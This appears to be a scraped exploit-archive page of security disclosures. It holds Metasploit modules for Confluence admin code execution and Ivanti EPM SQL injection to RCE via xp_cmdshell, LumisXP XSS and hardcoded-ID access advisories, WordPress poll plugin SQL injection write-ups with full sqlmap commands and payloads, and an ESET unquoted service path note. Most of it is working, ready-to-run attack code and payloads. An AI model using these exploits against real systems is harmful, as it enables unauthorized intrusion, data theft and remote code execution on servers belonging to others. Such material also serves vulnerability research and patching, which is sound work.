#{payload_string}")<br /> vprint_status('Sending POST request to trigger code execution')<br /><br /> # POST the multipart form for code execution. A neutral error will be returned in the web response, which we can ignore.<br /> res_upload = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'admin', 'plugins', 'newcode', 'addlanguage.action'),<br /> 'keep_cookies' => 'true',<br /> 'ctype' => "multipart/form-data; boundary=#{payload_form.bound}",<br /> 'data' => payload_form.to_s<br /> )<br /><br /> # Connection failure, no response, or malformed response.<br /> print_error('Target did not respond as expected during code execution attempt') unless res_upload<br /><br /> # If the response to the multipart request does not return a 200.<br /> print_error('The application returned a non-200 response during code execution attempt') unless res_upload.code == 200<br /> end<br /><br /> def exploit<br /> # Authenticate to Confluence.<br /> res_login = login(datastore['ADMIN_USER'], datastore['ADMIN_PASS'])<br /><br /> # Connection failure, no response, or malformed response.<br /> fail_with(Failure::Unknown, 'Target did not respond as expected during authentication') unless res_login<br /><br /> # If authentication does not result in a redirect with the provided "XsuccessX" 'Location' header value.<br /> fail_with(Failure::BadConfig, 'The target did not accept the provided credentials') unless res_login.code == 302 && res_login.headers['Location'].include?('XsuccessX')<br /><br /> vprint_status('Successfully authenticated to Confluence')<br /><br /> # Attempt to fetch a privileged page with the provided valid credentials to confirm the user is an administrator.<br /> res_check_admin = send_request_cgi(<br /> 'method' => 'GET',<br /> 'keep_cookies' => 'true',<br /> 'uri' => normalize_uri(target_uri.path, 'admin', 'console.action')<br /> )<br /><br /> # Connection failure, no response, or malformed response.<br /> fail_with(Failure::Unknown, 'Target did not respond as expected during privilege check') unless res_check_admin<br /><br /> # If a 'Location' header is returned in the response, the current session doesn't have full privileges.<br /> if res_check_admin.headers['Location']<br /><br /> # Confluence will redirect to the login page if the current user does not have admin privileges, so check for that here.<br /> if res_check_admin.headers['Location'].include?('login.action')<br /> fail_with(Failure::BadConfig, 'The provided credentials are valid, but the user does not have administrative privileges')<br /> end<br /><br /> vprint_status('The provided user is an administrator')<br /><br /> # Check whether Secure Administrator Sessions feature (sudo-like elevation prompt) is enabled. This feature is default on newer versions.<br /> if res_check_admin.headers['Location'].include?('authenticate.action')<br /> elevate<br /> end<br /><br /> # User is an administrator and Secure Administrator Sessions is disabled.<br /> else<br /> vprint_status('The provided user is an administrator')<br /> end<br /><br /> # As an administrator, check the host OS for selection between sh/cmd.exe in payload<br /> shell = get_host_os == 'win' ? '"cmd.exe", "/c"' : '"/bin/sh", "-c"'<br /><br /> # Upload a text file containing a payload to be evaluated by the script engine<br /> upload_payload(shell)<br /> end<br /><br />end<br /></code></pre>
<pre><code>=====[ Tempest Security Intelligence - ADV-6/2024<br />]==========================<br /><br />LumisXP v15.0.x to v16.1.x<br /><br />Author: Rodolfo Tavares<br /><br />Tempest Security Intelligence - Recife, Pernambuco - Brazil<br /><br />=====[ Table of Contents]==================================================<br /> * Overview<br /> * Detailed description<br /> * Timeline of disclosure<br /> * Thanks & Acknowledgements<br /> * References<br /><br />=====[ Vulnerability<br />Information]=============================================<br /> * Class: Improper Neutralization of Input During Web Page Generation<br />('Cross-site Scripting')<br /> ('Improper Neutralization of Input During Web Page Generation ('Cross-site<br />Scripting')') [CWE-79]<br /><br /> * CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - 5.4<br /><br />=====[ Overview]========================================================<br /> * System affected : LumisXP<br /> * Software Version : Version - v15.0.x to v16.1.x<br /> * Impacts :<br /> * Vulnerability: A cross-site scripting (XSS) vulnerability in the<br />component XsltResultControllerHtml.jsp of Lumisxp v15.0.x to v16.1.x allows<br />attackers to execute arbitrary web scripts or HTML via a crafted payload<br />injected into the lumPageID parameter<br /><br />=====[ Detailed<br />description]=================================================<br />* XSS [GET<br />/portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath=]:<br /><br />1 - Send the link by inserting the XSS payload into the lumPageID=<br />parameter.<br /><br />```<br />GET<br />/portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath=<br />```<br />2 - Verify that in the response your payload will be executed.<br /><br /><br />=====[ Timeline of<br />disclosure]===============================================<br /><br /> 2/Apr/2024 - Responsible disclosure was initiated with the vendor.<br /> 12/Apr/2024 - LumisXP Support confirmed the issue;<br /> 16/Fev/2024 - The vendor fixed the vulnerability<br /> 29/May/2024 - CVEs was assigned and reserved as CVE-2024-33326<br /><br />=====[ Thanks & Acknowledgements]========================================<br /> * Tempest Security Intelligence [1]<br /> * Rodolfo Tavares<br /> * Niklas Correa<br /><br />=====[ References ]=====================================================<br /><br /> [1][ [https://cwe.mitre.org/data/definitions/79.html]<br /> [2][ [https://www.tempest.com.br|https://www.tempest.com.br/]]<br /> [3][Thanks Filipe X.]<br /><br />=====[ EOF ]===========================================================<br />--<br /><br />-- <br /><br />*Esta mensagem é para uso exclusivo de seu destinatário e pode conter <br />informações privilegiadas e confidenciais. Todas as informações aqui <br />contidas devem ser tratadas como confidenciais e não devem ser divulgadas a <br />terceiros sem o prévio consentimento por escrito da Tempest. Se você não é <br />o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste <br />caso, por favor, notifique o remetente da mesma e destrua imediatamente a <br />mensagem.*<br /><br />*<br />*<br />*This message is intended solely for the use of its <br />addressee and may contain privileged or confidential information. All <br />information contained herein shall be treated as confidential and shall not <br />be disclosed to any third party without Tempest’s prior written approval. <br />If you are not the addressee you should not distribute, copy or file this <br />message. In this case, please notify the sender and destroy its contents <br />immediately.**<br />*<br />*<br />*<br /><br /></code></pre>
<pre><code>=====[ Tempest Security Intelligence - ADV-6/2024<br />]==========================<br /><br />LumisXP v15.0.x to v16.1.x<br /><br />Author: Rodolfo Tavares<br /><br />Tempest Security Intelligence - Recife, Pernambuco - Brazil<br /><br />=====[ Table of Contents]==================================================<br /><br />Overview<br />Detailed description<br />Timeline of disclosure<br />Thanks & Acknowledgements<br />References<br />=====[ Vulnerability<br />Information]=============================================<br /><br />Class: Use of Hard-coded Credentials<br />('Use of Hard-coded Credentials') [CWE-798]<br />CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - 5.3<br />=====[ Overview]========================================================<br /><br />System affected : LumisXP<br />Software Version : Version - v15.0.x to v16.1.x<br />Impacts :<br />Vulnerability: A hardcoded privileged ID within Lumisxp v15.0.x to v16.1.x<br />allows attackers to bypass authentication and access internal pages and<br />other sensitive information<br />=====[ Detailed<br />description]=================================================<br /><br />IDOR<br />http://localhost.com/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=<br />:<br />Access the link by inserting the GUID into the lumChannelId= parameter.<br />1 - Access your target using the following GUID (<br />00000000F00000000000000000000002 )<br />```<br />http://localhost.com/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=<br />```<br />2 - Verify that in the request response you will have access to various<br />component information and internal information about one or several domains.<br /><br />=====[ Timeline of<br />disclosure]===============================================<br /><br />2/Apr/2024 - Responsible disclosure was initiated with the vendor.<br />12/Apr/2024 - LumisXP Support confirmed the issue;<br />16/Fev/2024 - The vendor fixed the vulnerability<br />29/May/2024 - CVEs was assigned and reserved as CVE-2024-33329<br /><br />=====[ Thanks & Acknowledgements]========================================<br /><br />Tempest Security Intelligence [1]<br />Rodolfo Tavares<br />Niklas Correa<br />=====[ References ]=====================================================<br /><br />[1][ https://cwe.mitre.org/data/definitions/798.html<br />[2][ https://www.tempest.com.br]<br />[3][Thanks Filipe X.]<br /><br />=====[ EOF ]===========================================================<br /><br />--<br /><br />-- <br /><br />*Esta mensagem é para uso exclusivo de seu destinatário e pode conter <br />informações privilegiadas e confidenciais. Todas as informações aqui <br />contidas devem ser tratadas como confidenciais e não devem ser divulgadas a <br />terceiros sem o prévio consentimento por escrito da Tempest. Se você não é <br />o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste <br />caso, por favor, notifique o remetente da mesma e destrua imediatamente a <br />mensagem.*<br /><br />*<br />*<br />*This message is intended solely for the use of its <br />addressee and may contain privileged or confidential information. All <br />information contained herein shall be treated as confidential and shall not <br />be disclosed to any third party without Tempest’s prior written approval. <br />If you are not the addressee you should not distribute, copy or file this <br />message. In this case, please notify the sender and destroy its contents <br />immediately.**<br />*<br />*<br />*<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Poll Maker Plugin SQL Injection <br /># Date: 2024-07-11<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor: https://ays-pro.com/wordpress/poll-maker<br /># Version 5.3.2<br /><br /><br />1. **Access the Admin Panel:**<br /> - Navigate to the admin panel of your WordPress site.<br /> - Go to `Poll Maker > `Results` > https://localhost/wordpress/wp-admin/admin.php?page=poll-maker-ays-results&orderby=id&order=desc<br /> ```<br />3. Search for orderby parameter.<br /><br /><br />## SQLMAP COMMAND<br /><br />python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=poll-maker-ays-results&orderby=id&order=desc" --cookie="wordpress_logged_in_55e28812cb0bc43705127d62a25df794=admin|1720624086|cQgkhpgoy0ZxhQSupSHRw7bo9mxcwEWyUp0VreNnZBK|d74e12a1cdecafc50c920c18d4711826598780dd360f3a637abcc68a6086f7a3; _wp_travel_engine_session=010869411d3c5e302ccf674d9a49d453||1720689253||1720688893; wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|81237d448295de9d99b8560e6b6d9d8640f81c4dbb629e550e56860775baf0b3; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|d8d2e1da10a83ab054e39b8dfa5787c0dc2d586f364bcb584983b26efb857285; wordpress_test_cookie=WP Cookie check; wp-settings-1=editor=html; wp-settings-time-1=1720687513" --batch --dbms=mysql --threads=10 --no-cast --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 <br /><br /><br /><br />## RESULT<br /><br />Parameter: orderby (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)<br /> Payload: page=poll-maker-ays-results&orderby=id PROCEDURE ANALYSE(EXTRACTVALUE(3054,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x58655778))))),1)# wcUc&order=desc<br /> Vector: PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)<br />---<br /><br />---<br />[08:03:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s)<br />[08:03:59] [INFO] the back-end DBMS is MySQL<br />[08:03:59] [PAYLOAD] id/**/PrOCEdUrE/**/analySE(exTRActvALuE(6707,CoNcAT(0x5c,(iF((VeRSION()/**/LikE/**/0x254d61726961444225),BenChmaRk(5000000,MD5(0x6e454541)),6707)))),1)#/**/ZrRh<br />[08:03:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions <br />do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y<br />[08:04:01] [DEBUG] used the default behavior, running in batch mode<br />web application technology: Apache 2.4.54, PHP 8.0.23<br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br /><br /></code></pre>
<pre><code># Exploit Title: ESET NOD32 Antivirus 17.2.7.0 - Unquoted Service Path<br /># Exploit Author: Milad Karimi (Ex3ptionaL)<br /># Exploit Date: 2024-07-09<br /># Contact: miladgrayhat@gmail.com<br /># Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL<br /># Vendor : https://www.eset.com<br /># Version : 17.2.7.0<br /># Tested on OS: Microsoft Windows 10 pro x64<br /><br /><br />C:\Users\Ci3c0>sc qc ekrn<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ekrn<br /> TYPE : 20 WIN32_SHARE_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"<br /> LOAD_ORDER_GROUP : Base<br /> TAG : 0<br /> DISPLAY_NAME : ESET Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> class IvantiEpmRequestError < StandardError; end<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ivanti EPM RecordGoodApp SQLi RCE',<br /> 'Description' => %q{<br /> Ivanti Endpoint Manager (EPM) 2022 SU5 and prior are vulnerable to unauthenticated SQL injection which can be leveraged to achieve unauthenticated remote code execution.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'James Horseman', # original PoC, analysis<br /> 'Christophe De La Fuente' # Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://forums.ivanti.com/s/article/Security-Advisory-May-2024'],<br /> [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-24-507'],<br /> [ 'URL', 'https://github.com/horizon3ai/CVE-2024-29824'],<br /> [ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/'],<br /> [ 'CVE', '2024-29824']<br /> ],<br /> 'Platform' => ['windows'],<br /> 'Privileged' => true,<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DisclosureDate' => '2024-05-24',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> # MS SQL logs will contain evidence of `xp_cmdshell` being used<br /> # Fetch payload cannot be deleted while a Meterpreter session is active<br /> 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [ true, 'The URI of the EPM Web Services', '/']),<br /> OptInt.new('DELAY', [ true, 'The delay to detect if the target is vulnerable using time-based SQLi in second', 5])<br /> ]<br /> )<br /> end<br /><br /> def sqli_payload(cmd)<br /> "';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC xp_cmdshell '#{cmd.encode(xml: :text)}'--"<br /> end<br /><br /> def xml_payload(sqli)<br /> <<~XML<br /> <?xml version="1.0" encoding="utf-8"?><br /> <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"><br /> <soap12:Body><br /> <UpdateStatusEvents xmlns="http://tempuri.org/"><br /> <deviceID>string</deviceID><br /> <actions><br /> <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string"><br /> <status>GoodApp=1|md5=#{sqli}</status><br /> </Action><br /> </actions><br /> </UpdateStatusEvents><br /> </soap12:Body><br /> </soap12:Envelope><br /> XML<br /> end<br /><br /> def soap_request(sqli, timeout = 20)<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'WSStatusEvents', 'EventHandler.asmx'),<br /> 'method' => 'POST',<br /> 'ctype' => 'application/soap+xml; charset="utf-8"',<br /> 'data' => xml_payload(sqli)<br /> }, timeout)<br /><br /> raise IvantiEpmRequestError, 'Failed to send the SOAP request' unless res<br /><br /> res<br /> end<br /><br /> def check<br /> print_status("Checking if the target is vulnerable using time-based SQLi (delay=#{datastore['DELAY']})")<br /><br /> _res, elapsed1 = Rex::Stopwatch.elapsed_time { soap_request("';WAITFOR DELAY '0:0:0';select 1--") }<br /> vprint_status("Baseline query elapsed time: #{elapsed1}")<br /><br /> _res, elapsed2 = Rex::Stopwatch.elapsed_time { soap_request("';WAITFOR DELAY '0:0:#{datastore['DELAY']}';select 2--") }<br /> vprint_status("Delayed query elapsed time: #{elapsed2}")<br /><br /> if elapsed2.to_i > elapsed1.to_i && elapsed2 >= datastore['DELAY']<br /> return CheckCode::Vulnerable('SQLi executed')<br /> else<br /> return CheckCode::Safe('SQLi not executed')<br /> end<br /> rescue IvantiEpmRequestError => e<br /> return CheckCode::Unknown(e.to_s)<br /> end<br /><br /> def exploit<br /> soap_request(sqli_payload(payload.encoded), 1)<br /> rescue IvantiEpmRequestError<br /> # Expecting no response if an interactive payload such as Meterpreter is used<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: WordPress Poll Plugin SQL Injection <br /># Date: 2024-07-06<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor Homepage: https://total-soft.com/wp-poll/<br /># Version 2.3.6<br /><br /><br />1. **Access the Admin Panel:**<br /> - Navigate to the admin panel of your WordPress site.<br /> - Go to `TS Poll > `Create Pool ` > ` Use Theme` and save it. > https://localhost/wordpress/wp-admin/admin.php?page=ts-poll-builder&tsp-id=1<br /> ```<br />2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc<br />3. Search for orderby parameter.<br /><br /><br />## SQLMAP COMMAND<br /><br />python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc" \<br />--batch \<br />--dbms=mysql \<br />--thread=10 \<br />--no-cast \<br />--random-agent \<br />-v 3 \<br />--tamper="between,randomcase,space2comment" \<br />--level=5 \<br />--risk=3 \<br />-p orderby \<br />--cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|e111b736b22043864d0f8ea6da823ca00768a110af4da612c555add1979839d1; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|173622110c7f3812695b26c96ba4905a7c760ac41e37645150dd4869ae884c4b; wordpress_test_cookie=WP Cookie check; wp-settings-time-1=1720266472"<br /><br /><br />## RESULT<br /><br />---<br />Parameter: orderby (GET)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc<br /> Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc<br /> Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])<br />---<br /><br /></code></pre>